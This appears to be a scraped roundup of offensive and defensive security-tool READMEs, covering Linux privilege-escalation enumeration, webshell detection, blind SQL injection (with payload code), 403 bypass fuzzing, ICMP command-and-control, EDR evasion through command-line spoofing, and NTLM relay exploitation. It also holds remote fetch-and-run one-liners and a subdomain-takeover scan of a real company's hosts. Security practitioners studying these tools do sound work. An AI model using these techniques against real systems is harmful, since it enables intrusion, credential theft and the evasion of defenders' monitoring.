This project was inspired by https://github.com/rebootuser/LinEnum and uses many of its tests.

Unlike LinEnum, lse tries to gradualy expose the information depending on its importance from a privesc point of view.

What is it?

This shell script will show relevant information about the security of the local Linux system, helping to escalate privileges.

From version 2.0 it is mostly POSIX compliant and tested with shellcheck and posh.

It can also monitor processes to discover recurrent program executions. It monitors while it is executing all the other tests so you save some time. By default it monitors during 1 minute but you can choose the watch time with the -p parameter.

It has 3 levels of verbosity so you can control how much information you see.

In the default level you should see the highly important security flaws in the system. The level 1 (./lse.sh -l1) shows interesting information that should help you to privesc. The level 2 (./lse.sh -l2) will just dump all the information it gathers about the system.

By default it will ask you some questions: mainly the current user password (if you know it ;) so it can do some additional tests.

How to use it?

The idea is to get the information gradually.

First you should execute it just like ./lse.sh. If you see some green yes!, you probably have already some good stuff to work with.

If not, you should try the level 1 verbosity with ./lse.sh -l1 and you will see some more information that can be interesting.

If that does not help, level 2 will just dump everything you can gather about the service using ./lse.sh -l2. In this case you might find useful to use ./lse.sh -l2 | less -r.

You can also select what tests to execute by passing the -s parameter. With it you can select specific tests or sections to be executed. For example ./lse.sh -l2 -s usr010,net,pro will execute the test usr010 and all the tests in the sections net and pro.

Use: ./lse.sh [options]

OPTIONS
-c Disable color
-i Non interactive mode
-h This help
-l LEVEL Output verbosity level
0: Show highly important results. (default)
1: Show interesting results.
2: Show all gathered information.
-s SELECTION Comma separated list of sections or tests to run. Available
sections:
usr: User related tests.
sud: Sudo related tests.
fst: File system related tests.
sys: System related tests.
sec: Security measures related tests.
ret: Recurren tasks (cron, timers) related tests.
net: Network related tests.
srv: Services related tests.
pro: Processes related tests.
sof: Software related tests.
ctn: Container (docker, lxc) related tests.
cve: CVE related tests.
Specific tests can be used with their IDs (i.e.: usr020,sud)
-e PATHS Comma separated list of paths to exclude. This allows you
to do faster scans at the cost of completeness
-p SECONDS Time that the process monitor will spend watching for
processes. A value of 0 will disable any watch (default: 60)
-S Serve the lse.sh script in this host so it can be retrieved
from a remote host.

Is it pretty?

Usage demo

Also available in webm video


Level 0 (default) output sample


Level 1 verbosity output sample


Level 2 verbosity output sample


Examples

Direct execution oneliners

bash <(wget -q -O - "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh") -l2 -i
bash <(curl -s "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh") -l1 -i


ShellSweep - PowerShell/Python/Lua Tool Designed To Detect Potential Webshell Files In A Specified Directory

By: Zion3R

ShellSweep

ShellSweeping the evil

Why ShellSweep

"ShellSweep" is a PowerShell/Python/Lua tool designed to detect potential webshell files in a specified directory.

ShellSheep and it's suite of tools calculate the entropy of file contents to estimate the likelihood of a file being a webshell. High entropy indicates more randomness, which is a characteristic of encrypted or obfuscated codes often found in webshells. - It only processes files with certain extensions (.asp, .aspx, .asph, .php, .jsp), which are commonly used in webshells. - Certain directories can be excluded from scanning. - Files with certain hashes can be ignored during the scan.


How does ShellSweep find the shells?

Entropy, in the context of information theory or data science, is a measure of the unpredictability, randomness, or disorder in a set of data. The concept was introduced by Claude Shannon in his 1948 paper "A Mathematical Theory of Communication".

When applied to a file or a string of text, entropy can help assess the randomness of the data. Here's how it works: If a file consists of completely random data (each byte is just as likely to be any value between 0 and 255), the entropy is high, close to 8 (since log2(256) = 8).

If a file consists of highly structured data (for example, a text file where most bytes are ASCII characters), the entropy is lower. In the context of finding webshells or malicious files, entropy can be a useful indicator: - Many obfuscated scripts or encrypted payloads can have high entropy because the obfuscation or encryption process makes the data look random. - A normal text file or HTML file would generally have lower entropy because human-readable text has patterns and structure (certain letters are more common, words are usually separated by spaces, etc.). So, a file with unusually high entropy might be suspicious and worth further investigation. However, it's not a surefire indicator of maliciousness -- there are plenty of legitimate reasons a file might have high entropy, and plenty of ways malware might avoid causing high entropy. It's just one tool in a larger toolbox for detecting potential threats.

ShellSweep includes a Get-Entropy function that calculates the entropy of a file's contents by: - Counting how often each character appears in the file. - Using these frequencies to calculate the probability of each character. - Summing -p*log2(p) for each character, where p is the character's probability. This is the formula for entropy in information theory.

ShellScan

ShellScan provides the ability to scan multiple known bad webshell directories and output the average, median, minimum and maximum entropy values by file extension.

Pass ShellScan.ps1 some directories of webshells, any size set. I used:

  • https://github.com/tennc/webshell
  • https://github.com/BlackArch/webshells
  • https://github.com/tarwich/jackal/blob/master/libraries/

This will give a decent training set to get entropy values.

Output example:

Statistics for .aspx files:
Average entropy: 4.94212121048115
Minimum entropy: 1.29348709979974
Maximum entropy: 6.09830238020383
Median entropy: 4.85437969842084
Statistics for .asp files:
Average entropy: 5.51268104400858
Minimum entropy: 0.732406213077191
Maximum entropy: 7.69241278153711
Median entropy: 5.57351177724806

ShellCSV

First, let's break down the usage of ShellCSV and how it assists with identifying entropy of the good files on disk. The idea is that defenders can run this on web servers to gather all files and entropy values to better understand what paths and extensions are most prominent in their working environment.

See ShellCSV.csv as example output.

ShellSweep

First, choose your flavor: Python, PowerShell or Lua.

  • Based on results from ShellScan or ShellCSV, modify entropy values as needed.
  • Modify file extensions as needed. No need to look for ASPX on a non-ASPX app.
  • Modify paths. I don't recommend just scanning all the C:\, lots to filter.
  • Modify any filters needed.
  • Run it!

If you made it here, this is the part where you iterate on tuning. Find new shell? Gather entropy and modify as needed.

Questions

Feel free to open a Git issue.

Thank You

If you enjoyed this project, be sure to star the project and share with your family and friends.



Invoke-SessionHunter - Retrieve And Display Information About Active User Sessions On Remote Computers (No Admin Privileges Required)

By: Zion3R


Retrieve and display information about active user sessions on remote computers. No admin privileges required.

The tool leverages the remote registry service to query the HKEY_USERS registry hive on the remote computers. It identifies and extracts Security Identifiers (SIDs) associated with active user sessions, and translates these into corresponding usernames, offering insights into who is currently logged in.

If the -CheckAdminAccess switch is provided, it will gather sessions by authenticating to targets where you have local admin access using Invoke-WMIRemoting (which most likely will retrieve more results)

It's important to note that the remote registry service needs to be running on the remote computer for the tool to work effectively. In my tests, if the service is stopped but its Startup type is configured to "Automatic" or "Manual", the service will start automatically on the target computer once queried (this is native behavior), and sessions information will be retrieved. If set to "Disabled" no session information can be retrieved from the target.


Usage:

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Leo4j/Invoke-SessionHunter/main/Invoke-SessionHunter.ps1')

If run without parameters or switches it will retrieve active sessions for all computers in the current domain by querying the registry

Invoke-SessionHunter

Gather sessions by authenticating to targets where you have local admin access

Invoke-SessionHunter -CheckAsAdmin

You can optionally provide credentials in the following format

Invoke-SessionHunter -CheckAsAdmin -UserName "ferrari\Administrator" -Password "P@ssw0rd!"

You can also use the -FailSafe switch, which will direct the tool to proceed if the target remote registry becomes unresponsive.

This works in cobination with -Timeout | Default = 2, increase for slower networks.

Invoke-SessionHunter -FailSafe
Invoke-SessionHunter -FailSafe -Timeout 5

Use the -Match switch to show only targets where you have admin access and a privileged user is logged in

Invoke-SessionHunter -Match

All switches can be combined

Invoke-SessionHunter -CheckAsAdmin -UserName "ferrari\Administrator" -Password "P@ssw0rd!" -FailSafe -Timeout 5 -Match

Specify the target domain

Invoke-SessionHunter -Domain contoso.local

Specify a comma-separated list of targets or the full path to a file containing a list of targets - one per line

Invoke-SessionHunter -Targets "DC01,Workstation01.contoso.local"
Invoke-SessionHunter -Targets c:\Users\Public\Documents\targets.txt

Retrieve and display information about active user sessions on servers only

Invoke-SessionHunter -Servers

Retrieve and display information about active user sessions on workstations only

Invoke-SessionHunter -Workstations

Show active session for the specified user only

Invoke-SessionHunter -Hunt "Administrator"

Exclude localhost from the sessions retrieval

Invoke-SessionHunter -IncludeLocalHost

Return custom PSObjects instead of table-formatted results

Invoke-SessionHunter -RawResults

Do not run a port scan to enumerate for alive hosts before trying to retrieve sessions

Note: if a host is not reachable it will hang for a while

Invoke-SessionHunter -NoPortScan


Subhunter - A Fast Subdomain Takeover Tool

By: Zion3R


Subdomain takeover is a common vulnerability that allows an attacker to gain control over a subdomain of a target domain and redirect users intended for an organization's domain to a website that performs malicious activities, such as phishing campaigns, stealing user cookies, etc. It occurs when an attacker gains control over a subdomain of a target domain. Typically, this happens when the subdomain has a CNAME in the DNS, but no host is providing content for it. Subhunter takes a given list of Subdomains" title="Subdomains">subdomains and scans them to check this vulnerability.


Features:

  • Auto update
  • Uses random user agents
  • Built in Go
  • Uses a fork of fingerprint data from well known sources (can-i-take-over-xyz)

Installation:

Option 1:

Download from releases

Option 2:

Build from source:

$ git clone https://github.com/Nemesis0U/Subhunter.git
$ go build subhunter.go

Usage:

Options:

Usage of subhunter:
-l string
File including a list of hosts to scan
-o string
File to save results
-t int
Number of threads for scanning (default 50)
-timeout int
Timeout in seconds (default 20)

Demo (Added fake fingerprint for POC):

./Subhunter -l subdomains.txt -o test.txt

____ _ _ _
/ ___| _ _ | |__ | |__ _ _ _ __ | |_ ___ _ __
\___ \ | | | | | '_ \ | '_ \ | | | | | '_ \ | __| / _ \ | '__|
___) | | |_| | | |_) | | | | | | |_| | | | | | | |_ | __/ | |
|____/ \__,_| |_.__/ |_| |_| \__,_| |_| |_| \__| \___| |_|


A fast subdomain takeover tool

Created by Nemesis

Loaded 88 fingerprints for current scan

-----------------------------------------------------------------------------

[+] Nothing found at www.ubereats.com: Not Vulnerable
[+] Nothing found at testauth.ubereats.com: Not Vulnerable
[+] Nothing found at apple-maps-app-clip.ubereats.com: Not Vulnerable
[+] Nothing found at about.ubereats.com: Not Vulnerable
[+] Nothing found at beta.ubereats.com: Not Vulnerable
[+] Nothing found at ewp.ubereats.com: Not Vulnerable
[+] Nothi ng found at edgetest.ubereats.com: Not Vulnerable
[+] Nothing found at guest.ubereats.com: Not Vulnerable
[+] Google Cloud: Possible takeover found at testauth.ubereats.com: Vulnerable
[+] Nothing found at info.ubereats.com: Not Vulnerable
[+] Nothing found at learn.ubereats.com: Not Vulnerable
[+] Nothing found at merchants.ubereats.com: Not Vulnerable
[+] Nothing found at guest-beta.ubereats.com: Not Vulnerable
[+] Nothing found at merchant-help.ubereats.com: Not Vulnerable
[+] Nothing found at merchants-beta.ubereats.com: Not Vulnerable
[+] Nothing found at merchants-staging.ubereats.com: Not Vulnerable
[+] Nothing found at messages.ubereats.com: Not Vulnerable
[+] Nothing found at order.ubereats.com: Not Vulnerable
[+] Nothing found at restaurants.ubereats.com: Not Vulnerable
[+] Nothing found at payments.ubereats.com: Not Vulnerable
[+] Nothing found at static.ubereats.com: Not Vulnerable

Subhunter exiting...
Results written to test.txt




Hakuin - A Blazing Fast Blind SQL Injection Optimization And Automation Framework

By: Zion3R


Hakuin is a Blind SQL Injection (BSQLI) optimization and automation framework written in Python 3. It abstracts away the inference logic and allows users to easily and efficiently extract databases (DB) from vulnerable web applications. To speed up the process, Hakuin utilizes a variety of optimization methods, including pre-trained and adaptive language models, opportunistic guessing, parallelism and more.

Hakuin has been presented at esteemed academic and industrial conferences: - BlackHat MEA, Riyadh, 2023 - Hack in the Box, Phuket, 2023 - IEEE S&P Workshop on Offsensive Technology (WOOT), 2023

More information can be found in our paper and slides.


Installation

To install Hakuin, simply run:

pip3 install hakuin

Developers should install the package locally and set the -e flag for editable mode:

git clone git@github.com:pruzko/hakuin.git
cd hakuin
pip3 install -e .

Examples

Once you identify a BSQLI vulnerability, you need to tell Hakuin how to inject its queries. To do this, derive a class from the Requester and override the request method. Also, the method must determine whether the query resolved to True or False.

Example 1 - Query Parameter Injection with Status-based Inference
import aiohttp
from hakuin import Requester

class StatusRequester(Requester):
async def request(self, ctx, query):
r = await aiohttp.get(f'http://vuln.com/?n=XXX" OR ({query}) --')
return r.status == 200
Example 2 - Header Injection with Content-based Inference
class ContentRequester(Requester):
async def request(self, ctx, query):
headers = {'vulnerable-header': f'xxx" OR ({query}) --'}
r = await aiohttp.get(f'http://vuln.com/', headers=headers)
return 'found' in await r.text()

To start extracting data, use the Extractor class. It requires a DBMS object to contruct queries and a Requester object to inject them. Hakuin currently supports SQLite, MySQL, PSQL (PostgreSQL), and MSSQL (SQL Server) DBMSs, but will soon include more options. If you wish to support another DBMS, implement the DBMS interface defined in hakuin/dbms/DBMS.py.

Example 1 - Extracting SQLite/MySQL/PSQL/MSSQL
import asyncio
from hakuin import Extractor, Requester
from hakuin.dbms import SQLite, MySQL, PSQL, MSSQL

class StatusRequester(Requester):
...

async def main():
# requester: Use this Requester
# dbms: Use this DBMS
# n_tasks: Spawns N tasks that extract column rows in parallel
ext = Extractor(requester=StatusRequester(), dbms=SQLite(), n_tasks=1)
...

if __name__ == '__main__':
asyncio.get_event_loop().run_until_complete(main())

Now that eveything is set, you can start extracting DB metadata.

Example 1 - Extracting DB Schemas
# strategy:
# 'binary': Use binary search
# 'model': Use pre-trained model
schema_names = await ext.extract_schema_names(strategy='model')
Example 2 - Extracting Tables
tables = await ext.extract_table_names(strategy='model')
Example 3 - Extracting Columns
columns = await ext.extract_column_names(table='users', strategy='model')
Example 4 - Extracting Tables and Columns Together
metadata = await ext.extract_meta(strategy='model')

Once you know the structure, you can extract the actual content.

Example 1 - Extracting Generic Columns
# text_strategy:    Use this strategy if the column is text
res = await ext.extract_column(table='users', column='address', text_strategy='dynamic')
Example 2 - Extracting Textual Columns
# strategy:
# 'binary': Use binary search
# 'fivegram': Use five-gram model
# 'unigram': Use unigram model
# 'dynamic': Dynamically identify the best strategy. This setting
# also enables opportunistic guessing.
res = await ext.extract_column_text(table='users', column='address', strategy='dynamic')
Example 3 - Extracting Integer Columns
res = await ext.extract_column_int(table='users', column='id')
Example 4 - Extracting Float Columns
res = await ext.extract_column_float(table='products', column='price')
Example 5 - Extracting Blob (Binary Data) Columns
res = await ext.extract_column_blob(table='users', column='id')

More examples can be found in the tests directory.

Using Hakuin from the Command Line

Hakuin comes with a simple wrapper tool, hk.py, that allows you to use Hakuin's basic functionality directly from the command line. To find out more, run:

python3 hk.py -h

For Researchers

This repository is actively developed to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the frozen version as it contains the original code, experiment scripts, and an instruction manual for reproducing the results.

Cite Hakuin

@inproceedings{hakuin_bsqli,
title={Hakuin: Optimizing Blind SQL Injection with Probabilistic Language Models},
author={Pru{\v{z}}inec, Jakub and Nguyen, Quynh Anh},
booktitle={2023 IEEE Security and Privacy Workshops (SPW)},
pages={384--393},
year={2023},
organization={IEEE}
}


BypassFuzzer - Fuzz 401/403/404 Pages For Bypasses

By: Zion3R


The original 403fuzzer.py :)

Fuzz 401/403ing endpoints for bypasses

This tool performs various checks via headers, path normalization, verbs, etc. to attempt to bypass ACL's or URL validation.

It will output the response codes and length for each request, in a nicely organized, color coded way so things are reaable.

I implemented a "Smart Filter" that lets you mute responses that look the same after a certain number of times.

You can now feed it raw HTTP requests that you save to a file from Burp.

Follow me on twitter! @intrudir


Usage

usage: bypassfuzzer.py -h

Specifying a request to test

Best method: Feed it a raw HTTP request from Burp!

Simply paste the request into a file and run the script!
- It will parse and use cookies & headers from the request. - Easiest way to authenticate for your requests

python3 bypassfuzzer.py -r request.txt

Using other flags

Specify a URL

python3 bypassfuzzer.py -u http://example.com/test1/test2/test3/forbidden.html

Specify cookies to use in requests:
some examples:

--cookies "cookie1=blah"
-c "cookie1=blah; cookie2=blah"

Specify a method/verb and body data to send

bypassfuzzer.py -u https://example.com/forbidden -m POST -d "param1=blah&param2=blah2"
bypassfuzzer.py -u https://example.com/forbidden -m PUT -d "param1=blah&param2=blah2"

Specify custom headers to use with every request Maybe you need to add some kind of auth header like Authorization: bearer <token>

Specify -H "header: value" for each additional header you'd like to add:

bypassfuzzer.py -u https://example.com/forbidden -H "Some-Header: blah" -H "Authorization: Bearer 1234567"

Smart filter feature!

Based on response code and length. If it sees a response 8 times or more it will automatically mute it.

Repeats are changeable in the code until I add an option to specify it in flag

NOTE: Can't be used simultaneously with -hc or -hl (yet)

# toggle smart filter on
bypassfuzzer.py -u https://example.com/forbidden --smart

Specify a proxy to use

Useful if you wanna proxy through Burp

bypassfuzzer.py -u https://example.com/forbidden --proxy http://127.0.0.1:8080

Skip sending header payloads or url payloads

# skip sending headers payloads
bypassfuzzer.py -u https://example.com/forbidden -sh
bypassfuzzer.py -u https://example.com/forbidden --skip-headers

# Skip sending path normailization payloads
bypassfuzzer.py -u https://example.com/forbidden -su
bypassfuzzer.py -u https://example.com/forbidden --skip-urls

Hide response code/length

Provide comma delimited lists without spaces. Examples:

# Hide response codes
bypassfuzzer.py -u https://example.com/forbidden -hc 403,404,400

# Hide response lengths of 638
bypassfuzzer.py -u https://example.com/forbidden -hl 638

TODO

  • [x] Automatically check other methods/verbs for bypass
  • [x] absolute domain attack
  • [ ] Add HTTP/2 support
  • [ ] Looking for ideas. Ping me on twitter! @intrudir


PingRAT - Secretly Passes C2 Traffic Through Firewalls Using ICMP Payloads

By: Zion3R


PingRAT secretly passes C2 traffic through firewalls using ICMP payloads.

Features:

  • Uses ICMP for Command and Control
  • Undetectable by most AV/EDR solutions
  • Written in Go

Installation:

Download the binaries

or build the binaries and you are ready to go:

$ git clone https://github.com/Nemesis0U/PingRAT.git
$ go build client.go
$ go build server.go

Usage:

Server:

./server -h
Usage of ./server:
-d string
Destination IP address
-i string
Listener (virtual) Network Interface (e.g. eth0)

Client:

./client -h
Usage of ./client:
-d string
Destination IP address
-i string
(Virtual) Network Interface (e.g., eth0)



LOLSpoof - An Interactive Shell To Spoof Some LOLBins Command Line

By: Zion3R


LOLSpoof is a an interactive shell program that automatically spoof the command line arguments of the spawned process. Just call your incriminate-looking command line LOLBin (e.g. powershell -w hidden -enc ZwBlAHQALQBwAHIAbwBjAGUA....) and LOLSpoof will ensure that the process creation telemetry appears legitimate and clear.


Why

Process command line is a very monitored telemetry, being thoroughly inspected by AV/EDRs, SOC analysts or threat hunters.

How

  1. Prepares the spoofed command line out of the real one: lolbin.exe " " * sizeof(real arguments)
  2. Spawns that suspended LOLBin with the spoofed command line
  3. Gets the remote PEB address
  4. Gets the address of RTL_USER_PROCESS_PARAMETERS struct
  5. Gets the address of the command line unicode buffer
  6. Overrides the fake command line with the real one
  7. Resumes the main thread

Opsec considerations

Although this simple technique helps to bypass command line detection, it may introduce other suspicious telemetry: 1. Creation of suspended process 2. The new process has trailing spaces (but it's really easy to make it a repeated character or even random data instead) 3. Write to the spawned process with WriteProcessMemory

Build

Built with Nim 1.6.12 (compiling with Nim 2.X yields errors!)

nimble install winim

Known issue

Programs that clear or change the previous printed console messages (such as timeout.exe 10) breaks the program. when such commands are employed, you'll need to restart the console. Don't know how to fix that, open to suggestions.



SQLMC - Check All Urls Of A Domain For SQL Injections

By: Zion3R


SQLMC (SQL Injection Massive Checker) is a tool designed to scan a domain for SQL injection vulnerabilities. It crawls the given URL up to a specified depth, checks each link for SQL injection vulnerabilities, and reports its findings.

Features

  • Scans a domain for SQL injection vulnerabilities
  • Crawls the given URL up to a specified depth
  • Checks each link for SQL injection vulnerabilities
  • Reports vulnerabilities along with server information and depth

Installation

  1. Install the required dependencies: bash pip3 install sqlmc

Usage

Run sqlmc with the following command-line arguments:

  • -u, --url: The URL to scan (required)
  • -d, --depth: The depth to scan (required)
  • -o, --output: The output file to save the results

Example usage:

sqlmc -u http://example.com -d 2

Replace http://example.com with the URL you want to scan and 3 with the desired depth of the scan. You can also specify an output file using the -o or --output flag followed by the desired filename.

The tool will then perform the scan and display the results.

ToDo

  • Check for multiple GET params
  • Better injection checker trigger methods

Credits

License

This project is licensed under the GNU Affero General Public License v3.0.



BadExclusionsNWBO - An Evolution From BadExclusions To Identify Folder Custom Or Undocumented Exclusions On AV/EDR

By: Zion3R


BadExclusionsNWBO is an evolution from BadExclusions to identify folder custom or undocumented exclusions on AV/EDR.

How it works?

BadExclusionsNWBO copies and runs Hook_Checker.exe in all folders and subfolders of a given path. You need to have Hook_Checker.exe on the same folder of BadExclusionsNWBO.exe.

Hook_Checker.exe returns the number of EDR hooks. If the number of hooks is 7 or less means folder has an exclusion otherwise the folder is not excluded.


Original idea?

Since the release of BadExclusions I've been thinking on how to achieve the same results without creating that many noise. The solution came from another tool, https://github.com/asaurusrex/Probatorum-EDR-Userland-Hook-Checker.

If you download Probatorum-EDR-Userland-Hook-Checker and you run it inside a regular folder and on folder with an specific type of exclusion you will notice a huge difference. All the information is on the Probatorum repository.

Requirements

Each vendor apply exclusions on a different way. In order to get the list of folder exclusions an specific type of exclusion should be made. Not all types of exclusion and not all the vendors remove the hooks when they exclude a folder.

The user who runs BadExclusionsNWBO needs write permissions on the excluded folder in order to write Hook_Checker file and get the results.

EDR Demo

https://github.com/iamagarre/BadExclusionsNWBO/assets/89855208/46982975-f4a5-4894-b78d-8d6ed9b1c8c4



Ioctlance - A Tool That Is Used To Hunt Vulnerabilities In X64 WDM Drivers

By: Zion3R

Description

Presented at CODE BLUE 2023, this project titled Enhanced Vulnerability Hunting in WDM Drivers with Symbolic Execution and Taint Analysis introduces IOCTLance, a tool that enhances its capacity to detect various vulnerability types in Windows Driver Model (WDM) drivers. In a comprehensive evaluation involving 104 known vulnerable WDM drivers and 328 unknow n ones, IOCTLance successfully unveiled 117 previously unidentified vulnerabilities within 26 distinct drivers. As a result, 41 CVEs were reported, encompassing 25 cases of denial of service, 5 instances of insufficient access control, and 11 examples of elevation of privilege.


Features

Target Vulnerability Types

  • map physical memory
  • controllable process handle
  • buffer overflow
  • null pointer dereference
  • read/write controllable address
  • arbitrary shellcode execution
  • arbitrary wrmsr
  • arbitrary out
  • dangerous file operation

Optional Customizations

  • length limit
  • loop bound
  • total timeout
  • IoControlCode timeout
  • recursion
  • symbolize data section

Build

Docker (Recommand)

docker build .

Local

dpkg --add-architecture i386
apt-get update
apt-get install git build-essential python3 python3-pip python3-dev htop vim sudo \
openjdk-8-jdk zlib1g:i386 libtinfo5:i386 libstdc++6:i386 libgcc1:i386 \
libc6:i386 libssl-dev nasm binutils-multiarch qtdeclarative5-dev libpixman-1-dev \
libglib2.0-dev debian-archive-keyring debootstrap libtool libreadline-dev cmake \
libffi-dev libxslt1-dev libxml2-dev

pip install angr==9.2.18 ipython==8.5.0 ipdb==0.13.9

Analysis

# python3 analysis/ioctlance.py -h
usage: ioctlance.py [-h] [-i IOCTLCODE] [-T TOTAL_TIMEOUT] [-t TIMEOUT] [-l LENGTH] [-b BOUND]
[-g GLOBAL_VAR] [-a ADDRESS] [-e EXCLUDE] [-o] [-r] [-c] [-d]
path

positional arguments:
path dir (including subdirectory) or file path to the driver(s) to analyze

optional arguments:
-h, --help show this help message and exit
-i IOCTLCODE, --ioctlcode IOCTLCODE
analyze specified IoControlCode (e.g. 22201c)
-T TOTAL_TIMEOUT, --total_timeout TOTAL_TIMEOUT
total timeout for the whole symbolic execution (default 1200, 0 to unlimited)
-t TIMEOUT, --timeout TIMEOUT
timeout for analyze each IoControlCode (default 40, 0 to unlimited)
-l LENGTH, --length LENGTH
the limit of number of instructions for technique L engthLimiter (default 0, 0
to unlimited)
-b BOUND, --bound BOUND
the bound for technique LoopSeer (default 0, 0 to unlimited)
-g GLOBAL_VAR, --global_var GLOBAL_VAR
symbolize how many bytes in .data section (default 0 hex)
-a ADDRESS, --address ADDRESS
address of ioctl handler to directly start hunting with blank state (e.g.
140005c20)
-e EXCLUDE, --exclude EXCLUDE
exclude function address split with , (e.g. 140005c20,140006c20)
-o, --overwrite overwrite x.sys.json if x.sys has been analyzed (default False)
-r, --recursion do not kill state if detecting recursion (default False)
-c, --complete get complete base state (default False)
-d, --debug print debug info while analyzing (default False)

Evaluation

# python3 evaluation/statistics.py -h
usage: statistics.py [-h] [-w] path

positional arguments:
path target dir or file path

optional arguments:
-h, --help show this help message and exit
-w, --wdm copy the wdm drivers into <path>/wdm

Test

  1. Compile the testing examples in test to generate testing driver files.
  2. Run IOCTLance against the drvier files.

Reference



NTLM Relay Gat - Powerful Tool Designed To Automate The Exploitation Of NTLM Relays

By: Zion3R


NTLM Relay Gat is a powerful tool designed to automate the exploitation of NTLM relays using ntlmrelayx.py from the Impacket tool suite. By leveraging the capabilities of ntlmrelayx.py, NTLM Relay Gat streamlines the process of exploiting NTLM relay vulnerabilities, offering a range of functionalities from listing SMB shares to executing commands on MSSQL databases.


Features

  • Multi-threading Support: Utilize multiple threads to perform actions concurrently.
  • SMB Shares Enumeration: List available SMB shares.
  • SMB Shell Execution: Execute a shell via SMB.
  • Secrets Dumping: Dump secrets from the target.
  • MSSQL Database Enumeration: List available MSSQL databases.
  • MSSQL Command Execution: Execute operating system commands via xp_cmdshell or start SQL Server Agent jobs.

Prerequisites

Before you begin, ensure you have met the following requirements:

  • proxychains properly configured with ntlmrelayx SOCKS relay port
  • Python 3.6+

Installation

To install NTLM Relay Gat, follow these steps:

  1. Ensure that Python 3.6 or higher is installed on your system.

  2. Clone NTLM Relay Gat repository:

git clone https://github.com/ad0nis/ntlm_relay_gat.git
cd ntlm_relay_gat
  1. Install dependencies, if you don't have them installed already:
pip install -r requirements.txt

NTLM Relay Gat is now installed and ready to use.

Usage

To use NTLM Relay Gat, make sure you've got relayed sessions in ntlmrelayx.py's socks command output and that you have proxychains configured to use ntlmrelayx.py's proxy, and then execute the script with the desired options. Here are some examples of how to run NTLM Relay Gat:

# List available SMB shares using 10 threads
python ntlm_relay_gat.py --smb-shares -t 10

# Execute a shell via SMB
python ntlm_relay_gat.py --smb-shell --shell-path /path/to/shell

# Dump secrets from the target
python ntlm_relay_gat.py --dump-secrets

# List available MSSQL databases
python ntlm_relay_gat.py --mssql-dbs

# Execute an operating system command via xp_cmdshell
python ntlm_relay_gat.py --mssql-exec --mssql-method 1 --mssql-command 'whoami'

Disclaimer

NTLM Relay Gat is intended for educational and ethical penetration testing purposes only. Usage of NTLM Relay Gat for attacking targets without prior mutual consent is illegal. The developers of NTLM Relay Gat assume no liability and are not responsible for any misuse or damage caused by this tool.

License

This project is licensed under the MIT License - see the LICENSE file for details.



Gftrace - A Command Line Windows API Tracing Tool For Golang Binaries

By: Zion3R


A command line Windows API tracing tool for Golang binaries.

Note: This tool is a PoC and a work-in-progress prototype so please treat it as such. Feedbacks are always welcome!


How it works?

Although Golang programs contains a lot of nuances regarding the way they are built and their behavior in runtime they still need to interact with the OS layer and that means at some point they do need to call functions from the Windows API.

The Go runtime package contains a function called asmstdcall and this function is a kind of "gateway" used to interact with the Windows API. Since it's expected this function to call the Windows API functions we can assume it needs to have access to information such as the address of the function and it's parameters, and this is where things start to get more interesting.

Asmstdcall receives a single parameter which is pointer to something similar to the following structure:

struct LIBCALL {
DWORD_PTR Addr;
DWORD Argc;
DWORD_PTR Argv;
DWORD_PTR ReturnValue;

[...]
}

Some of these fields are filled after the API function is called, like the return value, others are received by asmstdcall, like the function address, the number of arguments and the list of arguments. Regardless when those are set it's clear that the asmstdcall function manipulates a lot of interesting information regarding the execution of programs compiled in Golang.

The gftrace leverages asmstdcall and the way it works to monitor specific fields of the mentioned struct and log it to the user. The tool is capable of log the function name, it's parameters and also the return value of each Windows function called by a Golang application. All of it with no need to hook a single API function or have a signature for it.

The tool also tries to ignore all the noise from the Go runtime initialization and only log functions called after it (i.e. functions from the main package).

If you want to know more about this project and research check the blogpost.

Installation

Download the latest release.

Usage

  1. Make sure gftrace.exe, gftrace.dll and gftrace.cfg are in the same directory.
  2. Specify which API functions you want to trace in the gftrace.cfg file (the tool does not work without API filters applied).
  3. Run gftrace.exe passing the target Golang program path as a parameter.
gftrace.exe <filepath> <params>

Configuration

All you need to do is specify which functions you want to trace in the gftrace.cfg file, separating it by comma with no spaces:

CreateFileW,ReadFile,CreateProcessW

The exact Windows API functions a Golang method X of a package Y would call in a specific scenario can only be determined either by analysis of the method itself or trying to guess it. There's some interesting characteristics that can be used to determine it, for example, Golang applications seems to always prefer to call functions from the "Wide" and "Ex" set (e.g. CreateFileW, CreateProcessW, GetComputerNameExW, etc) so you can consider it during your analysis.

The default config file contains multiple functions in which I tested already (at least most part of them) and can say for sure they can be called by a Golang application at some point. I'll try to update it eventually.

Examples

Tracing CreateFileW() and ReadFile() in a simple Golang file that calls "os.ReadFile" twice:

- CreateFileW("C:\Users\user\Desktop\doc.txt", 0x80000000, 0x3, 0x0, 0x3, 0x1, 0x0) = 0x168 (360)
- ReadFile(0x168, 0xc000108000, 0x200, 0xc000075d64, 0x0) = 0x1 (1)
- CreateFileW("C:\Users\user\Desktop\doc2.txt", 0x80000000, 0x3, 0x0, 0x3, 0x1, 0x0) = 0x168 (360)
- ReadFile(0x168, 0xc000108200, 0x200, 0xc000075d64, 0x0) = 0x1 (1)

Tracing CreateProcessW() in the TunnelFish malware:

- CreateProcessW("C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell /c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddress |  ft -hidetableheaders"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000ace98, 0xc0000acd68) = 0x1 (1)
- CreateProcessW("C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell /c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddress | ft -hidetableheaders"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000c4ec8, 0xc0000c4d98) = 0x1 (1)
- CreateProcessW("C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell /c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddres s | ft -hidetableheaders"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc00005eec8, 0xc00005ed98) = 0x1 (1)
